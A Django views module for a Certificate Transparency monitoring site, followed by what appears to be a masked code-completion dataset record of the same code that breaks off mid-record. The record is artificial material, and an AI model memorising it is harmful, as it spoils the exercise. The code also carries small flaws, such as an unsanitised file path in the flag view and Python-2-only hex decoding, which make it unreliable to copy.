cursor.execute("SELECT reltuples FROM pg_class WHERE relname = %s", [self.tablename])
row = cursor.fetchone()
count = int(row[0])
cursor.close()
return count
# passthrough all the other methods
def __getattr__(self, attr):
try:
return object.__getattr__(self, attr)
except AttributeError:
return getattr(self.queryset, attr)
def __getitem__(self, item):
return self.queryset[item]
class MetadataCountQuerySet():
def __init__(self, queryset, propertyname):
self.queryset = queryset
self.propertyname = propertyname
def count(self):
cursor = connection.cursor()
cursor.execute("SELECT name_value FROM metadata WHERE name_type = %s", [self.propertyname])
row = cursor.fetchone()
count = int(row[0])
cursor.close()
return count
# passthrough all the other methods
def __getattr__(self, attr):
try:
return object.__getattr__(self, attr)
except AttributeError:
return getattr(self.queryset, attr)
def __getitem__(self, key):
return self.queryset[key]
def index(request):
metadata = {}
expired_certs = 0
active_certs = 0
total_certs = 0
total_cas = 0
messages = []
if('subok' in request.GET):
messages.append({'class':'alert-info','text':'<strong>Subscription request</strong> - We sent you a confirmation link via email. Click it, and you should be all set.'})
if('unsubok' in request.GET):
messages.append({'class':'alert-info','text':'<strong>Unsubscription request</strong> - We sent you a confirmation link via email. sClick it, and you should be all set.'})
subscribeform = SubscribeUnsubscribeForm()
with connection.cursor() as c:
c.execute("SELECT NAME_TYPE, NAME_VALUE FROM metadata")
rows = c.fetchall()
for row in rows:
metadata[row[0]] = row[1]
return render(request, 'observer/index.html',
{
'total_certs': metadata['number_of_certs'],
'total_ca': metadata['number_of_cas'],
'total_logs': CtLog.objects.count(),
'active_certs': metadata['number_of_active_certs'],
'expired_certs': metadata['number_of_expired_certs'],
'revoked_certs': metadata['number_of_revoked_certs'],
'misissued_certs': metadata['number_of_misissued_certs'],
'behaving_cas' : metadata['number_of_correctly_behaving_cas'],
'interesting_cas' : metadata['number_of_interesting_cas'],
'biggest_log' : metadata['number_of_certs_in_biggest_log'],
'biggest_log_name' : CtLog.objects.get(id=metadata['biggest_log_id']).name,
'smallest_log' : metadata['number_of_certs_in_smallest_log'],
'uptime_days': (timezone.now().date()-datetime.date(2015,10,14)).days, #TODO
'messages' : messages,
'subscribeform' : subscribeform
}
)
def search(request):
term = request.GET.get("term","")
#found_ca = Ca.objects.filter(name__icontains=term)
#found_cn_dnsname = Certificate.objects.raw("SELECT DISTINCT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, x509_notBefore(CERTIFICATE) FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE (NAME_TYPE='dNSName' AND reverse(lower(NAME_VALUE)) LIKE reverse(lower(%s))) OR (NAME_TYPE='commonName' AND reverse(lower(NAME_VALUE)) LIKE reverse(lower(%s)))
#ORDER BY x509_notBefore(CERTIFICATE) DESC", [term, term])
return render(request, 'observer/search.html',
{
'term' : term
#'found_ca' : found_ca,
#'found_cn_dnsname' : found_cn_dnsname
}
)
def caall(request, page=None): #VIEW FOR CAs
if(page==None):
return HttpResponsePermanentRedirect("all/1")
page = int(page)
list_of_certs = []
filtered_qs = CaFilter(
request.GET,
queryset=Ca.objects.all().order_by('common_name')
)
paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)
page = request.GET.get('page')
try:
list_of_certs = paginator.page(page)
except PageNotAnInteger:
list_of_certs = paginator.page(1)
return render(request, 'observer/cas.html',
{
'list_of_ca': list_of_certs,
'filter': filtered_qs#Ca.objects.annotate(num_certs=Count('certificate')).order_by('-num_certs'),
}
)
def certall(request, page=None, ae=None, issuer_ca=None): #VIEW FOR Certificates->ALL
if(page==None):
return HttpResponsePermanentRedirect("all/1")
ae = request.GET.get("algorithm")
issuer_ca = request.GET.get("issuer_ca")
date_notbefore = request.GET.get("date_notbefore")
date_notbefore_gte = request.GET.get("date_notbefore_gte")
is_active = request.GET.get("is_active")
date_notafter = request.GET.get("date_notafter")
date_notafter_lte = request.GET.get("date_notafter_lte")
page = int(page)
list_of_certs = []
filtered_qs = CertFilter(
request.GET,
queryset=MetadataCountQuerySet(Certificate.objects.all().order_by('-id'), 'certificate')
)
paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)
page = request.GET.get('page')
#Alternative filter solution for better performance
#https://localhost/cert/all/1?issuer_ca=merge&date_notbefore=&date_notbefore_gte=&is_active=&date_notafter=&date_notafter_lte=
query = FastCountQuerySet(Certificate.objects.all().order_by('-id'), 'certificate')
paginator = Paginator(query, ITEMS_PER_PAGE)
if(is_active == "1" or is_active == "" or is_active == None):
if(issuer_ca != None and (is_active == None or is_active == "")):
query = FastCountQuerySet(Certificate.objects.filter(issuer_ca__common_name__contains = issuer_ca), 'certificate')
paginator = Paginator(query, ITEMS_PER_PAGE)
if(is_active != None and (issuer_ca == None or issuer_ca == "")):
query = FastCountQuerySet(Certificate.objects.filter(not_before__lte=timezone.now(), not_after__gte=timezone.now()), 'certificate')
if(issuer_ca == "" and is_active == ""):
query = FastCountQuerySet(Certificate.objects.all(), 'certificate')
paginator = Paginator(query, ITEMS_PER_PAGE)
if(is_active != None and issuer_ca != None ):
query = FastCountQuerySet(Certificate.objects.filter(
issuer_ca__common_name__contains = issuer_ca,
not_before__lte=timezone.now(), not_after__gte=timezone.now(), ), 'certificate')
paginator = Paginator(query, ITEMS_PER_PAGE)
if(is_active == "0" or is_active == "" or is_active == None):
if(issuer_ca != None and (is_active == None or is_active == "")):
query = FastCountQuerySet(Certificate.objects.filter(issuer_ca__common_name__contains = issuer_ca), 'certificate')
paginator = Paginator(query, ITEMS_PER_PAGE)
if(is_active != None and (issuer_ca == None or issuer_ca == "")):
query = FastCountQuerySet(Certificate.objects.filter(not_after__lte=datetime.date.today()), 'certificate')
if(issuer_ca == "" and is_active == ""):
query = FastCountQuerySet(Certificate.objects.all(), 'certificate')
paginator = Paginator(query, ITEMS_PER_PAGE)
if(is_active != None and issuer_ca != None ):
query = FastCountQuerySet(Certificate.objects.filter(
issuer_ca__common_name__contains = issuer_ca,
not_after__lte=datetime.date.today() ), 'certificate')
paginator = Paginator(query, ITEMS_PER_PAGE)
####################################################
try:
list_of_certs = paginator.page(page)
except PageNotAnInteger:
list_of_certs = paginator.page(1)
#if(ae != None):
#list_of_certs = Certificate.objects.raw("SELECT * FROM certificate WHERE SIGNATURE_ALGORITHM=%s", [ae])
return render(request, 'observer/certs.html',
{
'list_of_certs': list_of_certs,
'filter': filtered_qs
}
)
def certactive(request, page=None):
if(page==None):
return HttpResponsePermanentRedirect("active/1")
page = int(page)
list_of_certs = []
paginator = Paginator(MetadataCountQuerySet(Certificate.objects.filter(not_before__lte=timezone.now(), not_after__gte=timezone.now()), 'number_of_active_certs'), ITEMS_PER_PAGE)
if(page in paginator.page_range):
list_of_certs = paginator.page(page)
return render(request, 'observer/certs.html',
{
'list_of_certs': list_of_certs
}
)
def certexpired(request, page=None, order=None):
if(page==None):
return HttpResponsePermanentRedirect("expired/1")
page = int(page)
list_of_certs = []
paginator = Paginator(MetadataCountQuerySet(Certificate.objects.filter(not_after__lt=timezone.now()), 'number_of_expired_certs'), ITEMS_PER_PAGE)
# paginator = Paginator(Certificate.objects.filter(not_after__lt=timezone.now()), ITEMS_PER_PAGE)
if(page in paginator.page_range):
list_of_certs = paginator.page(page)
return render(request, 'observer/certs.html',
{
'list_of_certs': list_of_certs
}
)
def certrevoked(request, page=None):
if(page==None):
return HttpResponsePermanentRedirect("revoked/1")
page = int(page)
list_of_certs = []
paginator = Paginator(Certificate.objects.filter(id__in=RevokedCertificate.objects.all().values('certificate')), ITEMS_PER_PAGE)
if(page in paginator.page_range):
list_of_certs = paginator.page(page)
return render(request, 'observer/certs.html',
{
'list_of_certs': list_of_certs
}
)
def certs_by_log(request, log_id, page=None):
if(page==None):
return HttpResponsePermanentRedirect("./1")
page = int(page)
log_id = int(log_id)
list_of_certs = []
paginator = Paginator(CtLogEntry.objects.filter(ct_log=log_id), ITEMS_PER_PAGE)
if(page in paginator.page_range):
list_of_entries = paginator.page(page)
return render(request, 'observer/log_certs.html',
{
'log': get_object_or_404(CtLog, pk=log_id),
'list_of_entries' : list_of_entries
}
)
def certs_by_ca(request, ca_id, page=None):
if(page==None):
return HttpResponsePermanentRedirect("certificates/1")
page = int(page)
ca_id = int(ca_id)
list_of_certs = []
filtered_qs = CertFilter(
request.GET,
queryset=Certificate.objects.filter(issuer_ca=ca_id)
)
paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)
page = request.GET.get('page')
try:
list_of_certs = paginator.page(page)
except PageNotAnInteger:
list_of_certs = paginator.page(1)
return render(request, 'observer/certs.html',
{
'list_of_certs': list_of_certs,
'filter': filtered_qs
})
# paginator = Paginator(Certificate.objects.filter(issuer_ca=ca_id), ITEMS_PER_PAGE)
# if(page in paginator.page_range):
# list_of_certs = paginator.page(page)
# return render(request, 'observer/certs.html',
# {
# 'list_of_certs': list_of_certs
# }
# )
def list_cn_certs(request, cn):
field_id = 'common name'
expression = cn
list_of_certs = Certificate.objects.raw("SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='commonName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC", [cn])
#list_of_certs = Certificate.objects.filter(certificate__common_name=cn).order_by('not_before')
issues = issuefinder.get_all_issues(list(list_of_certs))
#issues = issuefinder.get_first_certificates(list_of_certs)
return render(request, 'observer/history.html',
{
'field_id': field_id,
'expression': expression,
'list_of_certs': list_of_certs,
'issues':issues
}
)
def list_dnsname_certs(request, dnsname):
field_id = 'dnsname'
expression = dnsname
list_of_certs = Certificate.objects.raw("SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='dNSName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC", [dnsname])
issues = issuefinder.get_all_issues(list(list_of_certs))
return render(request, 'observer/history.html',
{
'field_id': field_id,
'expression': expression,
'list_of_certs': list_of_certs,
'issues':issues
}
)
def log(request): #LOG VIEW
return render(request, 'observer/logs.html',
{
#'list_of_logs': CtLog.objects.all().annotate(entries=Count('ctlogentry')).order_by('latest_entry_id')
'list_of_logs': CtLog.objects.all().order_by('-is_active','-latest_entry_id','name')
}
)
def cadetail(request,ca_id):
ca = get_object_or_404(Ca, pk=ca_id)
#counting number of issued CA's:
number_of_issued_ca = Certificate.objects.filter(issuer_ca=ca_id).count()
return render(request, 'observer/cadetail.html', { 'ca' : ca, 'number_of_issued_ca': number_of_issued_ca})
def certdetail(request,cert_id=None,cert_sha256=None):
if cert_sha256:
cert_sha256_bin = cert_sha256.decode('hex') #Does not work on python3
cert = get_object_or_404(Certificate, certificate__sha256=cert_sha256_bin)
if cert_id:
cert = get_object_or_404(Certificate, pk=cert_id)
cacert = CaCertificate.objects.filter(certificate_id=cert_id).first()
digest_sha256 = str(cert.get_digest_sha256()).replace(':','').lower()[2:-1]
#TODO
#Certificate.objects.raw("select (select count(*) from certificate WHERE x509_keySize(certificate) = %s)*100/cast(COUNT(*) as float) as percentage, 0 as id FROM certificate;",
#[cert.get_x509_data().get_pubkey().bits()])
#return render(request, 'observer/certdetail.html', { 'certificate' : cert, 'ca_certificate' : cacert, 'keysize_distribution': round(keysize_distribution[0].percentage,2)})
return render(request, 'observer/certdetail.html', { 'certificate' : cert, 'ca_certificate' : cacert, 'keysize_distribution': 'TODO', 'digest_sha256':digest_sha256})
def certraw(request,cert_id):
cert = get_object_or_404(Certificate, pk=cert_id)
response = HttpResponse(cert.certificate, content_type='application/octet-stream')
response['Content-Disposition'] = 'attachment; filename="certificate_{}.crt'.format(cert_id)
return response
def logdetail(request,log_id):
log = get_object_or_404(CtLog, pk=log_id)
number_of_issued_ca = CtLogEntry.objects.filter(ct_log=log_id).count()
return render(request, 'observer/logdetail.html', { 'log' : log, 'number_of_issued_ca' : number_of_issued_ca})
def flag(request, flag_id):
try:
with open(os.path.join(BASE_DIR, "static/flags/png/{0}.png".format(flag_id.lower())), "rb") as f:
return HttpResponse(f.read(), content_type="image/png")
except IOError:
with open(os.path.join(BASE_DIR, "static/flags/png/-.png"), "rb") as f:
return HttpResponse(f.read(), content_type="image/png")
def imprint(request):
return render(request, 'observer/imprint.html')
def issues(request):
return render(request, 'observer/issues.html')
def status(request):
status = {'analyzer':{'lastrun':0}, 'monitor':{'lastrun':0}, 'msg':'ok'}
try:
with open('/static/data/status.json', 'r') as f:
status = json.load(f)
status['analyzer']['lastrun'] = datetime.datetime.fromtimestamp(status['analyzer']['lastrun'])
status['monitor']['lastrun'] = datetime.datetime.fromtimestamp(status['monitor']['lastrun'])
except Exception as e:
status['msg'] = "Could not load status file."+str(e)
return render(request, 'observer/status.html', {'status':status})
def certcheck(request):
if request.method == 'POST':
serial_post = request.POST['serial']
sqlQuery = """SELECT id FROM certificate WHERE serial=%s"""
sqlQuery_commonName = """SELECT * FROM ca WHERE """
current_time = str(datetime.datetime.now())
serial_int = int(serial_post, 16)
serial = serial_int.to_bytes((serial_int.bit_length() + 15) // 8, 'big', signed=True) or b'\0'
sqlData = (psycopg2.Binary(serial),)
found_serial = Certificate.objects.raw(sqlQuery, sqlData)
if(found_serial):
return HttpResponse(found_serial)
else:
return HttpResponse("none")
return render(request, 'observer/checkserial.html', {})
|
normal
|
{
"blob_id": "bcc959dcdb60c55897158e85d73c59592b112c12",
"index": 6381,
"step-1": "<mask token>\n\n\nclass FastCountQuerySet:\n\n def __init__(self, queryset, tablename):\n self.queryset = queryset\n self.tablename = tablename\n\n def count(self):\n cursor = connection.cursor()\n cursor.execute('SELECT reltuples FROM pg_class WHERE relname = %s',\n [self.tablename])\n row = cursor.fetchone()\n count = int(row[0])\n cursor.close()\n return count\n\n def __getattr__(self, attr):\n try:\n return object.__getattr__(self, attr)\n except AttributeError:\n return getattr(self.queryset, attr)\n\n def __getitem__(self, item):\n return self.queryset[item]\n\n\nclass MetadataCountQuerySet:\n\n def __init__(self, queryset, propertyname):\n self.queryset = queryset\n self.propertyname = propertyname\n\n def count(self):\n cursor = connection.cursor()\n cursor.execute('SELECT name_value FROM metadata WHERE name_type = %s',\n [self.propertyname])\n row = cursor.fetchone()\n count = int(row[0])\n cursor.close()\n return count\n\n def __getattr__(self, attr):\n try:\n return object.__getattr__(self, attr)\n except AttributeError:\n return getattr(self.queryset, attr)\n\n def __getitem__(self, key):\n return self.queryset[key]\n\n\ndef index(request):\n metadata = {}\n expired_certs = 0\n active_certs = 0\n total_certs = 0\n total_cas = 0\n messages = []\n if 'subok' in request.GET:\n messages.append({'class': 'alert-info', 'text':\n '<strong>Subscription request</strong> - We sent you a confirmation link via email. Click it, and you should be all set.'\n })\n if 'unsubok' in request.GET:\n messages.append({'class': 'alert-info', 'text':\n '<strong>Unsubscription request</strong> - We sent you a confirmation link via email. sClick it, and you should be all set.'\n })\n subscribeform = SubscribeUnsubscribeForm()\n with connection.cursor() as c:\n c.execute('SELECT NAME_TYPE, NAME_VALUE FROM metadata')\n rows = c.fetchall()\n for row in rows:\n metadata[row[0]] = row[1]\n return render(request, 'observer/index.html', {'total_certs': metadata[\n 'number_of_certs'], 'total_ca': metadata['number_of_cas'],\n 'total_logs': CtLog.objects.count(), 'active_certs': metadata[\n 'number_of_active_certs'], 'expired_certs': metadata[\n 'number_of_expired_certs'], 'revoked_certs': metadata[\n 'number_of_revoked_certs'], 'misissued_certs': metadata[\n 'number_of_misissued_certs'], 'behaving_cas': metadata[\n 'number_of_correctly_behaving_cas'], 'interesting_cas': metadata[\n 'number_of_interesting_cas'], 'biggest_log': metadata[\n 'number_of_certs_in_biggest_log'], 'biggest_log_name': CtLog.\n objects.get(id=metadata['biggest_log_id']).name, 'smallest_log':\n metadata['number_of_certs_in_smallest_log'], 'uptime_days': (\n timezone.now().date() - datetime.date(2015, 10, 14)).days,\n 'messages': messages, 'subscribeform': subscribeform})\n\n\ndef search(request):\n term = request.GET.get('term', '')\n return render(request, 'observer/search.html', {'term': term})\n\n\ndef caall(request, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('all/1')\n page = int(page)\n list_of_certs = []\n filtered_qs = CaFilter(request.GET, queryset=Ca.objects.all().order_by(\n 'common_name'))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/cas.html', {'list_of_ca':\n list_of_certs, 'filter': filtered_qs})\n\n\ndef certall(request, page=None, ae=None, issuer_ca=None):\n if page == None:\n return HttpResponsePermanentRedirect('all/1')\n ae = request.GET.get('algorithm')\n issuer_ca = request.GET.get('issuer_ca')\n date_notbefore = request.GET.get('date_notbefore')\n date_notbefore_gte = request.GET.get('date_notbefore_gte')\n is_active = request.GET.get('is_active')\n date_notafter = request.GET.get('date_notafter')\n date_notafter_lte = request.GET.get('date_notafter_lte')\n page = int(page)\n list_of_certs = []\n filtered_qs = CertFilter(request.GET, queryset=MetadataCountQuerySet(\n Certificate.objects.all().order_by('-id'), 'certificate'))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n query = FastCountQuerySet(Certificate.objects.all().order_by('-id'),\n 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active == '1' or is_active == '' or is_active == None:\n if issuer_ca != None and (is_active == None or is_active == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and (issuer_ca == None or issuer_ca == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n not_before__lte=timezone.now(), not_after__gte=timezone.now\n ()), 'certificate')\n if issuer_ca == '' and is_active == '':\n query = FastCountQuerySet(Certificate.objects.all(), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and issuer_ca != None:\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca, not_before__lte\n =timezone.now(), not_after__gte=timezone.now()), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active == '0' or is_active == '' or is_active == None:\n if issuer_ca != None and (is_active == None or is_active == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and (issuer_ca == None or issuer_ca == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n not_after__lte=datetime.date.today()), 'certificate')\n if issuer_ca == '' and is_active == '':\n query = FastCountQuerySet(Certificate.objects.all(), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and issuer_ca != None:\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca, not_after__lte=\n datetime.date.today()), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs, 'filter': filtered_qs})\n\n\n<mask token>\n\n\ndef certexpired(request, page=None, order=None):\n if page == None:\n return HttpResponsePermanentRedirect('expired/1')\n page = int(page)\n list_of_certs = []\n paginator = Paginator(MetadataCountQuerySet(Certificate.objects.filter(\n not_after__lt=timezone.now()), 'number_of_expired_certs'),\n ITEMS_PER_PAGE)\n if page in paginator.page_range:\n list_of_certs = paginator.page(page)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs})\n\n\ndef certrevoked(request, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('revoked/1')\n page = int(page)\n list_of_certs = []\n paginator = Paginator(Certificate.objects.filter(id__in=\n RevokedCertificate.objects.all().values('certificate')), ITEMS_PER_PAGE\n )\n if page in paginator.page_range:\n list_of_certs = paginator.page(page)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs})\n\n\ndef certs_by_log(request, log_id, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('./1')\n page = int(page)\n log_id = int(log_id)\n list_of_certs = []\n paginator = Paginator(CtLogEntry.objects.filter(ct_log=log_id),\n ITEMS_PER_PAGE)\n if page in paginator.page_range:\n list_of_entries = paginator.page(page)\n return render(request, 'observer/log_certs.html', {'log':\n get_object_or_404(CtLog, pk=log_id), 'list_of_entries':\n list_of_entries})\n\n\ndef certs_by_ca(request, ca_id, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('certificates/1')\n page = int(page)\n ca_id = int(ca_id)\n list_of_certs = []\n filtered_qs = CertFilter(request.GET, queryset=Certificate.objects.\n filter(issuer_ca=ca_id))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs, 'filter': filtered_qs})\n\n\n<mask token>\n\n\ndef list_dnsname_certs(request, dnsname):\n field_id = 'dnsname'\n expression = dnsname\n list_of_certs = Certificate.objects.raw(\n \"SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='dNSName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC\"\n , [dnsname])\n issues = issuefinder.get_all_issues(list(list_of_certs))\n return render(request, 'observer/history.html', {'field_id': field_id,\n 'expression': expression, 'list_of_certs': list_of_certs, 'issues':\n issues})\n\n\ndef log(request):\n return render(request, 'observer/logs.html', {'list_of_logs': CtLog.\n objects.all().order_by('-is_active', '-latest_entry_id', 'name')})\n\n\ndef cadetail(request, ca_id):\n ca = get_object_or_404(Ca, pk=ca_id)\n number_of_issued_ca = Certificate.objects.filter(issuer_ca=ca_id).count()\n return render(request, 'observer/cadetail.html', {'ca': ca,\n 'number_of_issued_ca': number_of_issued_ca})\n\n\ndef certdetail(request, cert_id=None, cert_sha256=None):\n if cert_sha256:\n cert_sha256_bin = cert_sha256.decode('hex')\n cert = get_object_or_404(Certificate, certificate__sha256=\n cert_sha256_bin)\n if cert_id:\n cert = get_object_or_404(Certificate, pk=cert_id)\n cacert = CaCertificate.objects.filter(certificate_id=cert_id).first()\n digest_sha256 = str(cert.get_digest_sha256()).replace(':', '').lower()[2:-1\n ]\n return render(request, 'observer/certdetail.html', {'certificate': cert,\n 'ca_certificate': cacert, 'keysize_distribution': 'TODO',\n 'digest_sha256': digest_sha256})\n\n\n<mask token>\n\n\ndef logdetail(request, log_id):\n log = get_object_or_404(CtLog, pk=log_id)\n number_of_issued_ca = CtLogEntry.objects.filter(ct_log=log_id).count()\n return render(request, 'observer/logdetail.html', {'log': log,\n 'number_of_issued_ca': number_of_issued_ca})\n\n\n<mask token>\n\n\ndef issues(request):\n return render(request, 'observer/issues.html')\n\n\ndef status(request):\n status = {'analyzer': {'lastrun': 0}, 'monitor': {'lastrun': 0}, 'msg':\n 'ok'}\n try:\n with open('/static/data/status.json', 'r') as f:\n status = json.load(f)\n status['analyzer']['lastrun'] = datetime.datetime.fromtimestamp(status\n ['analyzer']['lastrun'])\n status['monitor']['lastrun'] = datetime.datetime.fromtimestamp(status\n ['monitor']['lastrun'])\n except Exception as e:\n status['msg'] = 'Could not load status file.' + str(e)\n return render(request, 'observer/status.html', {'status': status})\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass FastCountQuerySet:\n\n def __init__(self, queryset, tablename):\n self.queryset = queryset\n self.tablename = tablename\n\n def count(self):\n cursor = connection.cursor()\n cursor.execute('SELECT reltuples FROM pg_class WHERE relname = %s',\n [self.tablename])\n row = cursor.fetchone()\n count = int(row[0])\n cursor.close()\n return count\n\n def __getattr__(self, attr):\n try:\n return object.__getattr__(self, attr)\n except AttributeError:\n return getattr(self.queryset, attr)\n\n def __getitem__(self, item):\n return self.queryset[item]\n\n\nclass MetadataCountQuerySet:\n\n def __init__(self, queryset, propertyname):\n self.queryset = queryset\n self.propertyname = propertyname\n\n def count(self):\n cursor = connection.cursor()\n cursor.execute('SELECT name_value FROM metadata WHERE name_type = %s',\n [self.propertyname])\n row = cursor.fetchone()\n count = int(row[0])\n cursor.close()\n return count\n\n def __getattr__(self, attr):\n try:\n return object.__getattr__(self, attr)\n except AttributeError:\n return getattr(self.queryset, attr)\n\n def __getitem__(self, key):\n return self.queryset[key]\n\n\ndef index(request):\n metadata = {}\n expired_certs = 0\n active_certs = 0\n total_certs = 0\n total_cas = 0\n messages = []\n if 'subok' in request.GET:\n messages.append({'class': 'alert-info', 'text':\n '<strong>Subscription request</strong> - We sent you a confirmation link via email. Click it, and you should be all set.'\n })\n if 'unsubok' in request.GET:\n messages.append({'class': 'alert-info', 'text':\n '<strong>Unsubscription request</strong> - We sent you a confirmation link via email. sClick it, and you should be all set.'\n })\n subscribeform = SubscribeUnsubscribeForm()\n with connection.cursor() as c:\n c.execute('SELECT NAME_TYPE, NAME_VALUE FROM metadata')\n rows = c.fetchall()\n for row in rows:\n metadata[row[0]] = row[1]\n return render(request, 'observer/index.html', {'total_certs': metadata[\n 'number_of_certs'], 'total_ca': metadata['number_of_cas'],\n 'total_logs': CtLog.objects.count(), 'active_certs': metadata[\n 'number_of_active_certs'], 'expired_certs': metadata[\n 'number_of_expired_certs'], 'revoked_certs': metadata[\n 'number_of_revoked_certs'], 'misissued_certs': metadata[\n 'number_of_misissued_certs'], 'behaving_cas': metadata[\n 'number_of_correctly_behaving_cas'], 'interesting_cas': metadata[\n 'number_of_interesting_cas'], 'biggest_log': metadata[\n 'number_of_certs_in_biggest_log'], 'biggest_log_name': CtLog.\n objects.get(id=metadata['biggest_log_id']).name, 'smallest_log':\n metadata['number_of_certs_in_smallest_log'], 'uptime_days': (\n timezone.now().date() - datetime.date(2015, 10, 14)).days,\n 'messages': messages, 'subscribeform': subscribeform})\n\n\ndef search(request):\n term = request.GET.get('term', '')\n return render(request, 'observer/search.html', {'term': term})\n\n\ndef caall(request, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('all/1')\n page = int(page)\n list_of_certs = []\n filtered_qs = CaFilter(request.GET, queryset=Ca.objects.all().order_by(\n 'common_name'))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/cas.html', {'list_of_ca':\n list_of_certs, 'filter': filtered_qs})\n\n\ndef certall(request, page=None, ae=None, issuer_ca=None):\n if page == None:\n return HttpResponsePermanentRedirect('all/1')\n ae = request.GET.get('algorithm')\n issuer_ca = request.GET.get('issuer_ca')\n date_notbefore = request.GET.get('date_notbefore')\n date_notbefore_gte = request.GET.get('date_notbefore_gte')\n is_active = request.GET.get('is_active')\n date_notafter = request.GET.get('date_notafter')\n date_notafter_lte = request.GET.get('date_notafter_lte')\n page = int(page)\n list_of_certs = []\n filtered_qs = CertFilter(request.GET, queryset=MetadataCountQuerySet(\n Certificate.objects.all().order_by('-id'), 'certificate'))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n query = FastCountQuerySet(Certificate.objects.all().order_by('-id'),\n 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active == '1' or is_active == '' or is_active == None:\n if issuer_ca != None and (is_active == None or is_active == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and (issuer_ca == None or issuer_ca == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n not_before__lte=timezone.now(), not_after__gte=timezone.now\n ()), 'certificate')\n if issuer_ca == '' and is_active == '':\n query = FastCountQuerySet(Certificate.objects.all(), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and issuer_ca != None:\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca, not_before__lte\n =timezone.now(), not_after__gte=timezone.now()), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active == '0' or is_active == '' or is_active == None:\n if issuer_ca != None and (is_active == None or is_active == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and (issuer_ca == None or issuer_ca == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n not_after__lte=datetime.date.today()), 'certificate')\n if issuer_ca == '' and is_active == '':\n query = FastCountQuerySet(Certificate.objects.all(), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and issuer_ca != None:\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca, not_after__lte=\n datetime.date.today()), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs, 'filter': filtered_qs})\n\n\n<mask token>\n\n\ndef certexpired(request, page=None, order=None):\n if page == None:\n return HttpResponsePermanentRedirect('expired/1')\n page = 